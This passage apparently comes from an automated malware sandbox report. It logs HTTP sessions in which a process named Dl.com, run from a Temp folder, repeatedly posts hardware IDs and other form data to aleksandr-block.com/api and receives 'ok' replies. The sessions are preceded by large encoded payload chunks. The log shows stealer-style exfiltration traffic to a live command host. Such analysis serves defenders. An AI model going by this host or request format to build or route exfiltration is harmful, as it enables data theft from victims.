                                                                  2025-01-15 15:01:53 UTC1369INData Raw: 48 44 78 4c 41 37 56 43 38 32 35 64 51 75 65 6c 59 36 74 76 2f 66 30 36 71 52 76 42 7a 37 30 65 66 57 73 49 2f 44 72 39 37 47 34 67 50 48 34 69 6c 41 72 54 4f 31 41 62 33 7a 46 37 78 30 50 55 39 64 71 78 4d 39 58 2f 36 43 6f 51 47 30 58 38 42 74 6a 70 4a 77 6b 4a 51 77 4b 51 49 2b 35 75 58 4f 65 37 49 47 63 76 62 2b 7a 4e 38 76 77 6a 68 4f 75 42 48 68 78 69 62 4a 30 6d 2b 4d 30 62 4e 44 52 2b 4b 72 52 57 78 7a 39 38 47 2b 74 46 55 2b 74 6a 35 4e 58 47 6b 52 76 70 38 38 41 79 4c 45 74 74 2b 41 2f 4e 31 41 38 38 61 58 74 6a 6a 4a 4c 7a 50 32 67 65 37 39 6c 6a 77 31 76 49 72 4f 37 59 47 35 7a 54 2b 43 38 42 4d 6d 33 4d 41 73 7a 42 4a 7a 41 49 5a 6a 61 59 54 76 4d 44 61 44 2f 50 4e 58 50 72 55 2f 44 42 39 71 55 2f 36 63 65 73 43 69 52 6a 58 50 30 66 7a 50 46
                                                                  Data Ascii: HDxLA7VC825dQuelY6tv/f06qRvBz70efWsI/Dr97G4gPH4ilArTO1Ab3zF7x0PU9dqxM9X/6CoQG0X8BtjpJwkJQwKQI+5uXOe7IGcvb+zN8vwjhOuBHhxibJ0m+M0bNDR+KrRWxz98G+tFU+tj5NXGkRvp88AyLEtt+A/N1A88aXtjjJLzP2ge79ljw1vIrO7YG5zT+C8BMm3MAszBJzAIZjaYTvMDaD/PNXPrU/DB9qU/6cesCiRjXP0fzPF
                                                                  2025-01-15 15:01:53 UTC188INData Raw: 77 4b 51 63 2b 35 75 58 41 66 44 52 56 66 44 52 2b 44 74 7a 72 6b 62 7a 66 2f 38 4d 68 78 50 64 63 67 47 2b 50 6b 44 4a 42 68 53 53 6f 42 75 78 7a 74 31 49 74 34 4e 63 35 70 69 74 66 56 79 6c 59 65 35 76 36 78 48 41 43 35 56 6d 53 62 51 33 41 35 42 43 48 59 2b 71 48 37 50 4c 32 41 66 39 7a 56 33 34 31 66 41 79 63 62 74 41 38 48 6e 79 43 49 73 47 32 33 49 4e 76 7a 39 4c 77 77 68 65 7a 75 4d 58 6f 34 4f 50 53 4d 7a 4f 56 50 37 62 34 33 31 6b 35 31 47 2b 63 2f 56 48 32 46 54 58 63 51 6d 38 4e 30 2f 44 43 68 2b 4d 72 52 65 2b 79 74 38 41 36 38 4a 66 39 74 0d 0a
                                                                  Data Ascii: wKQc+5uXAfDRVfDR+Dtzrkbzf/8MhxPdcgG+PkDJBhSSoBuxzt1It4Nc5pitfVylYe5v6xHAC5VmSbQ3A5BCHY+qH7PL2Af9zV341fAycbtA8HnyCIsG23INvz9LwwhezuMXo4OPSMzOVP7b431k51G+c/VH2FTXcQm8N0/DCh+MrRe+yt8A68Jf9t
                                                                  2025-01-15 15:01:53 UTC1369INData Raw: 33 64 33 61 0d 0a 6e 37 4d 6e 71 74 54 66 74 77 2f 67 4f 47 47 35 73 78 53 62 51 6a 41 35 42 43 4d 61 65 57 55 70 72 35 6c 78 65 33 32 68 76 35 31 4c 56 6c 4f 36 56 4c 38 6e 7a 32 41 59 6b 59 30 58 59 43 76 7a 42 48 78 41 73 62 68 71 49 56 76 73 4c 54 42 50 50 46 57 50 33 58 2b 6a 4a 7a 36 51 61 2b 63 2b 46 48 32 46 54 2b 61 41 4b 39 50 51 50 58 54 41 66 41 70 42 7a 37 6d 35 63 45 38 4d 56 64 2b 39 54 30 4f 33 4f 73 51 50 70 31 2f 77 47 44 47 39 39 36 43 4c 77 2f 54 38 59 49 48 34 47 76 47 37 54 49 30 6b 69 33 67 31 7a 6d 6d 4b 31 39 53 71 70 65 36 57 54 31 52 35 39 61 77 6a 38 4f 76 33 73 62 69 41 4d 4d 69 71 6b 65 76 73 7a 53 43 2f 62 45 56 76 6a 55 2f 7a 52 7a 72 30 66 33 5a 76 6f 4c 6a 68 50 56 63 77 65 2b 4d 55 44 46 51 6c 44 41 70 41 6a 37 6d 35 63
                                                                  Data Ascii: 3d3an7MnqtTftw/gOGG5sxSbQjA5BCMaeWUpr5lxe32hv51LVlO6VL8nz2AYkY0XYCvzBHxAsbhqIVvsLTBPPFWP3X+jJz6Qa+c+FH2FT+aAK9PQPXTAfApBz7m5cE8MVd+9T0O3OsQPp1/wGDG996CLw/T8YIH4GvG7TI0ki3g1zmmK19Sqpe6WT1R59awj8Ov3sbiAMMiqkevszSC/bEVvjU/zRzr0f3ZvoLjhPVcwe+MUDFQlDApAj7m5c
                                                                  2025-01-15 15:01:53 UTC1369INData Raw: 65 7a 55 2b 79 39 2b 75 31 71 2b 4f 72 6b 41 6d 46 53 44 50 7a 2b 30 4b 31 50 4c 51 43 2b 57 6f 41 61 77 7a 74 74 49 35 6f 31 43 76 74 2f 35 66 53 50 70 54 76 46 39 2b 67 69 42 48 64 64 79 44 4c 6f 2b 51 73 34 47 46 49 71 6a 46 72 33 43 30 67 4c 36 77 6c 48 33 33 2f 30 36 65 4c 73 49 73 44 54 2b 48 38 42 4d 6d 31 59 4f 6f 54 56 54 69 42 31 51 6d 65 4d 58 74 34 4f 50 53 50 33 4a 56 50 72 66 2b 54 74 2b 72 30 58 2f 65 2f 67 48 6a 78 44 51 64 67 2b 79 4e 6b 62 46 42 67 79 4b 71 42 2b 33 79 74 73 46 75 59 30 62 2b 63 43 31 5a 54 75 59 52 66 42 36 2f 68 48 41 43 35 56 6d 53 62 51 33 41 35 42 43 48 34 79 73 45 37 54 41 31 41 6e 7a 30 55 6e 79 30 66 30 34 64 36 4a 47 2b 47 62 2f 43 49 6b 58 32 48 59 4f 75 7a 64 4a 79 77 56 65 7a 75 4d 58 6f 34 4f 50 53 4e 72 55
                                                                  Data Ascii: ezU+y9+u1q+OrkAmFSDPz+0K1PLQC+WoAawzttI5o1Cvt/5fSPpTvF9+giBHddyDLo+Qs4GFIqjFr3C0gL6wlH33/06eLsIsDT+H8BMm1YOoTVTiB1QmeMXt4OPSP3JVPrf+Tt+r0X/e/gHjxDQdg+yNkbFBgyKqB+3ytsFuY0b+cC1ZTuYRfB6/hHAC5VmSbQ3A5BCH4ysE7TA1Anz0Uny0f04d6JG+Gb/CIkX2HYOuzdJywVezuMXo4OPSNrU
                                                                  2025-01-15 15:01:53 UTC1369INData Raw: 6c 39 49 2b 6c 4f 39 33 4c 2b 41 59 34 47 33 6e 6b 47 76 44 4a 4b 7a 41 6f 64 67 4b 63 55 76 4d 62 55 42 50 4c 45 57 50 48 63 2f 44 4e 79 70 67 69 77 4e 50 34 66 77 45 79 62 58 68 4b 77 4e 30 36 49 48 56 43 5a 34 78 65 33 67 34 39 49 39 63 31 65 2f 74 4c 7a 4f 58 36 76 51 76 74 30 38 67 53 50 45 4e 31 37 42 72 4d 77 53 73 6b 45 47 34 71 6f 46 72 62 41 30 51 36 35 6a 52 76 35 77 4c 56 6c 4f 34 6c 54 38 33 6a 2b 52 35 39 61 77 6a 38 4f 76 33 73 62 69 41 6b 53 68 4b 51 51 74 73 44 66 44 66 33 4a 58 76 37 51 35 7a 56 37 72 6c 72 73 64 50 41 43 6a 42 66 62 65 77 2b 36 50 55 44 4d 51 6c 44 41 70 41 6a 37 6d 35 63 6c 39 63 52 79 2b 63 4f 31 49 6a 57 77 43 50 6c 34 75 56 2f 41 46 64 42 31 42 72 34 34 52 63 73 4a 47 34 71 69 46 37 50 4f 78 51 76 32 7a 46 2f 2b 31
                                                                  Data Ascii: l9I+lO93L+AY4G3nkGvDJKzAodgKcUvMbUBPLEWPHc/DNypgiwNP4fwEybXhKwN06IHVCZ4xe3g49I9c1e/tLzOX6vQvt08gSPEN17BrMwSskEG4qoFrbA0Q65jRv5wLVlO4lT83j+R59awj8Ov3sbiAkShKQQtsDfDf3JXv7Q5zV7rlrsdPACjBfbew+6PUDMQlDApAj7m5cl9cRy+cO1IjWwCPl4uV/AFdB1Br44RcsJG4qiF7POxQv2zF/+1
                                                                  2025-01-15 15:01:53 UTC1369INData Raw: 75 53 2b 78 6d 2f 77 53 57 46 35 78 42 4e 35 51 74 53 63 38 53 47 5a 65 73 55 50 57 44 32 45 69 68 2b 68 76 33 33 2b 34 73 62 61 52 59 2b 54 54 47 53 63 41 4d 6d 79 64 4a 68 6a 68 4e 78 67 55 49 6b 65 34 33 72 63 6e 51 47 50 37 55 56 4c 36 57 74 54 73 37 38 52 75 77 4e 50 30 57 77 45 79 4c 4c 56 4c 6d 61 42 53 59 55 41 48 4f 75 6c 43 74 67 34 39 61 74 34 4e 4a 76 6f 43 31 65 6e 69 37 57 76 68 33 37 77 54 48 4b 75 56 59 45 37 34 39 56 4e 6b 38 49 49 65 35 48 62 33 55 78 6b 54 73 77 46 58 77 33 2b 4e 39 4e 65 6c 48 76 69 7a 41 52 38 68 55 35 44 46 4a 71 33 73 62 69 44 63 64 6a 71 30 58 72 64 4b 61 4c 2b 50 4f 58 65 6e 4a 74 58 4d 37 72 77 69 6d 4a 72 64 48 68 41 57 62 4a 31 6e 68 59 42 61 62 56 55 37 53 76 46 36 69 67 38 46 49 6f 5a 45 56 76 73 71 31 5a 54
                                                                  Data Ascii: uS+xm/wSWF5xBN5QtSc8SGZesUPWD2Eih+hv33+4sbaRY+TTGScAMmydJhjhNxgUIke43rcnQGP7UVL6WtTs78RuwNP0WwEyLLVLmaBSYUAHOulCtg49at4NJvoC1eni7Wvh37wTHKuVYE749VNk8IIe5Hb3UxkTswFXw3+N9NelHvizAR8hU5DFJq3sbiDcdjq0XrdKaL+POXenJtXM7rwimJrdHhAWbJ1nhYBabVU7SvF6ig8FIoZEVvsq1ZT
                                                                  2025-01-15 15:01:53 UTC1369INData Raw: 65 76 34 52 6b 56 6e 7a 58 44 4f 4a 65 57 2f 50 46 31 79 30 70 41 43 71 79 4e 6f 45 75 59 30 62 2b 4a 69 74 62 54 58 70 54 4f 38 30 6f 56 66 53 54 34 34 73 58 75 4e 70 58 49 59 62 58 70 62 6a 53 4f 6d 4e 6c 78 71 35 6d 78 75 35 32 2b 63 76 66 61 70 65 2f 54 50 48 4f 61 63 61 33 48 34 66 6f 79 78 4d 39 6a 77 4c 67 36 30 65 76 4e 58 47 53 4c 65 44 56 4c 36 41 7a 48 30 7a 36 58 65 77 4e 4f 46 48 32 46 54 75 66 41 65 39 50 46 58 5a 54 7a 6d 4f 70 42 47 74 30 38 41 48 75 59 30 62 2b 4a 69 74 62 7a 58 70 54 4f 38 30 6f 56 66 53 54 34 34 73 58 75 4e 70 58 49 59 62 58 70 62 6a 53 4f 6d 4e 6c 78 71 35 6d 78 75 35 32 2b 63 76 66 61 70 65 2f 54 50 48 4f 61 63 61 33 48 34 66 6f 79 78 4d 68 79 77 6f 6f 5a 30 75 72 73 44 5a 42 76 37 56 53 72 36 57 74 54 49 37 38 58 47
                                                                  Data Ascii: ev4RkVnzXDOJeW/PF1y0pACqyNoEuY0b+JitbTXpTO80oVfST44sXuNpXIYbXpbjSOmNlxq5mxu52+cvfape/TPHOaca3H4foyxM9jwLg60evNXGSLeDVL6AzH0z6XewNOFH2FTufAe9PFXZTzmOpBGt08AHuY0b+JitbzXpTO80oVfST44sXuNpXIYbXpbjSOmNlxq5mxu52+cvfape/TPHOaca3H4foyxMhywooZ0ursDZBv7VSr6WtTI78XG


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.549878188.114.96.34435064C:\Users\user\AppData\Local\Temp\755831\Dl.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-15 15:01:54 UTC284OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=ESNZ04AVW4MN3ZUF8
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 12829
                                                                  Host: aleksandr-block.com
                                                                  2025-01-15 15:01:54 UTC12829OUTData Raw: 2d 2d 45 53 4e 5a 30 34 41 56 57 34 4d 4e 33 5a 55 46 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 38 41 31 44 44 46 34 32 35 32 39 42 41 33 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 45 53 4e 5a 30 34 41 56 57 34 4d 4e 33 5a 55 46 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 53 4e 5a 30 34 41 56 57 34 4d 4e 33 5a 55 46 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 58 47 44 52 2d 2d 4b 61 74 32 32 32 0d 0a 2d
                                                                  Data Ascii: --ESNZ04AVW4MN3ZUF8Content-Disposition: form-data; name="hwid"CF8A1DDF42529BA3B960CC18D99B375A--ESNZ04AVW4MN3ZUF8Content-Disposition: form-data; name="pid"2--ESNZ04AVW4MN3ZUF8Content-Disposition: form-data; name="lid"VXGDR--Kat222-
                                                                  2025-01-15 15:01:56 UTC1136INHTTP/1.1 200 OK
                                                                  Date: Wed, 15 Jan 2025 15:01:56 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=pdricvtmstvh5gvtf114hmmi8c; expires=Sun, 11 May 2025 08:48:33 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BD%2F6DhDosmLYbA%2Fw2nAjkY8MqGoCiPGNwXc2Fsxi0s2nie8vmGVbV%2BGxIN4SwLsEEUHKUl4z%2Fnyt7hPjvF9DMrEE934wNRyGrUNvGuWNi0loKJvbUy2QbEjavKDQ2m%2Fvn9dCfppf"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9026be68a9f0aafd-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14238&min_rtt=14235&rtt_var=5344&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13771&delivery_rate=204768&cwnd=32&unsent_bytes=0&cid=5c065d6d2b442bc2&ts=2274&x=0"
                                                                  2025-01-15 15:01:56 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                  Data Ascii: fok 8.46.123.189
                                                                  2025-01-15 15:01:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.549895188.114.96.34435064C:\Users\user\AppData\Local\Temp\755831\Dl.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-15 15:01:57 UTC275OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=XRC9CSRQ
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 15017
                                                                  Host: aleksandr-block.com
                                                                  2025-01-15 15:01:57 UTC15017OUTData Raw: 2d 2d 58 52 43 39 43 53 52 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 38 41 31 44 44 46 34 32 35 32 39 42 41 33 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 58 52 43 39 43 53 52 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 52 43 39 43 53 52 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 58 47 44 52 2d 2d 4b 61 74 32 32 32 0d 0a 2d 2d 58 52 43 39 43 53 52 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                  Data Ascii: --XRC9CSRQContent-Disposition: form-data; name="hwid"CF8A1DDF42529BA3B960CC18D99B375A--XRC9CSRQContent-Disposition: form-data; name="pid"2--XRC9CSRQContent-Disposition: form-data; name="lid"VXGDR--Kat222--XRC9CSRQContent-Disposit
                                                                  2025-01-15 15:01:58 UTC1131INHTTP/1.1 200 OK
                                                                  Date: Wed, 15 Jan 2025 15:01:58 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=t18vhmj70m3s2coiliemnqq3lk; expires=Sun, 11 May 2025 08:48:36 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PhbIiTdJLv2qPSvDWzmox4MhUawhDTm%2BjoeXiOmOCKA7W17bna%2BtwZHUQ7OqiIMtSJBsLoFE5nQq97SRe2ffzA%2FeIZIZYQPHYFpPgLsoGYK66i2qwlC4gAM6xnZllbwXrdaHKjC%2B"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9026be7a2e86b405-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=15001&min_rtt=13814&rtt_var=7555&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=15950&delivery_rate=125235&cwnd=32&unsent_bytes=0&cid=ba0c694e4d3dbc97&ts=724&x=0"
                                                                  2025-01-15 15:01:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                  Data Ascii: fok 8.46.123.189
                                                                  2025-01-15 15:01:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.549905188.114.96.34435064C:\Users\user\AppData\Local\Temp\755831\Dl.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-15 15:01:58 UTC283OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=NNNQYNZVNRHFORGR
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 20555
                                                                  Host: aleksandr-block.com
                                                                  2025-01-15 15:01:58 UTC15331OUTData Raw: 2d 2d 4e 4e 4e 51 59 4e 5a 56 4e 52 48 46 4f 52 47 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 38 41 31 44 44 46 34 32 35 32 39 42 41 33 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 4e 4e 4e 51 59 4e 5a 56 4e 52 48 46 4f 52 47 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4e 4e 4e 51 59 4e 5a 56 4e 52 48 46 4f 52 47 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 58 47 44 52 2d 2d 4b 61 74 32 32 32 0d 0a 2d 2d 4e 4e
                                                                  Data Ascii: --NNNQYNZVNRHFORGRContent-Disposition: form-data; name="hwid"CF8A1DDF42529BA3B960CC18D99B375A--NNNQYNZVNRHFORGRContent-Disposition: form-data; name="pid"3--NNNQYNZVNRHFORGRContent-Disposition: form-data; name="lid"VXGDR--Kat222--NN
                                                                  2025-01-15 15:01:58 UTC5224OUTData Raw: 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00
                                                                  Data Ascii: MMZh'F3Wun 4F([:7s~X`nO`i
                                                                  2025-01-15 15:01:59 UTC1136INHTTP/1.1 200 OK
                                                                  Date: Wed, 15 Jan 2025 15:01:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=1bqhg48ic6lcjr9jmbhslrjh7f; expires=Sun, 11 May 2025 08:48:38 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TZRCO6JjUr2k4icSvDPfF%2Bok%2BERI7QAIvTo0mwLuhZbd%2FU%2FKfPn74%2FxjJwcsbUz%2FCn3cc4KYUEDeLuZFeXCWpDbF1iRIi5M9vqXQbRA7czteyC7Wo95Kg51j8R0Js6xW2K7FPxDW"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9026be82a900a28f-YUL
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=17848&min_rtt=17842&rtt_var=6702&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21518&delivery_rate=163219&cwnd=32&unsent_bytes=0&cid=4c7a4c484f3d5596&ts=726&x=0"
                                                                  2025-01-15 15:01:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                  Data Ascii: fok 8.46.123.189
                                                                  2025-01-15 15:01:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.549913188.114.96.34435064C:\Users\user\AppData\Local\Temp\755831\Dl.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-15 15:02:00 UTC277OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=NWJCJ5L3NU5
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 1369
                                                                  Host: aleksandr-block.com
                                                                  2025-01-15 15:02:00 UTC1369OUTData Raw: 2d 2d 4e 57 4a 43 4a 35 4c 33 4e 55 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 38 41 31 44 44 46 34 32 35 32 39 42 41 33 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 4e 57 4a 43 4a 35 4c 33 4e 55 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 57 4a 43 4a 35 4c 33 4e 55 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 58 47 44 52 2d 2d 4b 61 74 32 32 32 0d 0a 2d 2d 4e 57 4a 43 4a 35 4c 33 4e 55 35 0d 0a 43 6f 6e 74
                                                                  Data Ascii: --NWJCJ5L3NU5Content-Disposition: form-data; name="hwid"CF8A1DDF42529BA3B960CC18D99B375A--NWJCJ5L3NU5Content-Disposition: form-data; name="pid"1--NWJCJ5L3NU5Content-Disposition: form-data; name="lid"VXGDR--Kat222--NWJCJ5L3NU5Cont
                                                                  2025-01-15 15:02:00 UTC1129INHTTP/1.1 200 OK
                                                                  Date: Wed, 15 Jan 2025 15:02:00 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=95kr4in7nani42s04fgsukherl; expires=Sun, 11 May 2025 08:48:39 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=us6TklyDH3DPdJzocKyJBMR6e08dnhENgxyqGY8qcSoNY3PH34c7xhsGDaJ%2BcnswbMdkWqmYOLli%2BxX0DfET8KEFOSi5%2FnzfeF9zEyusqhUoOT7%2FbuiyqAyzQ8sYWpW8fznlNwSz"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9026be8b5c7caaf2-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13701&min_rtt=13693&rtt_var=5151&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2282&delivery_rate=212255&cwnd=32&unsent_bytes=0&cid=10274be0b493292c&ts=364&x=0"
                                                                  2025-01-15 15:02:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                  Data Ascii: fok 8.46.123.189
                                                                  2025-01-15 15:02:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.549922188.114.96.34435064C:\Users\user\AppData\Local\Temp\755831\Dl.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-15 15:02:01 UTC283OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
